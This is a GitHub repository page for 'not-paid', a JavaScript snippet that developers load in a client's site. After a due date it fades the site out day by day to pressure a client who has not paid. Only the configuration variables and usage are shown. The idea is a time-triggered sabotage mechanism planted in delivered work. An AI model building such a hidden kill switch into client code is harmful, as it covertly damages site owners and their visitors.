Client did not pay? Add opacity to the body tag and increase it every day until their site completely fades away
Branch: master
Clone or download
Latest commit a3f5957 Jan 28, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Jan 28, 2019
not-paid.js Update not-paid.js Mar 2, 2017

README.md

Client did not pay?

Add opacity to the body tag and increase it every day until their site completely fades away. Set a due date and customize the number of days you offer them until the website is fully vanished.

/* change these variables as you wish */
	var due_date = new Date('2017-02-27');
	var days_deadline = 60;
/* stop changing here */

Usage

Just load the .js file in <head>

Author

Inspired from twitter (@riklomas) Made by Ciprian, Romania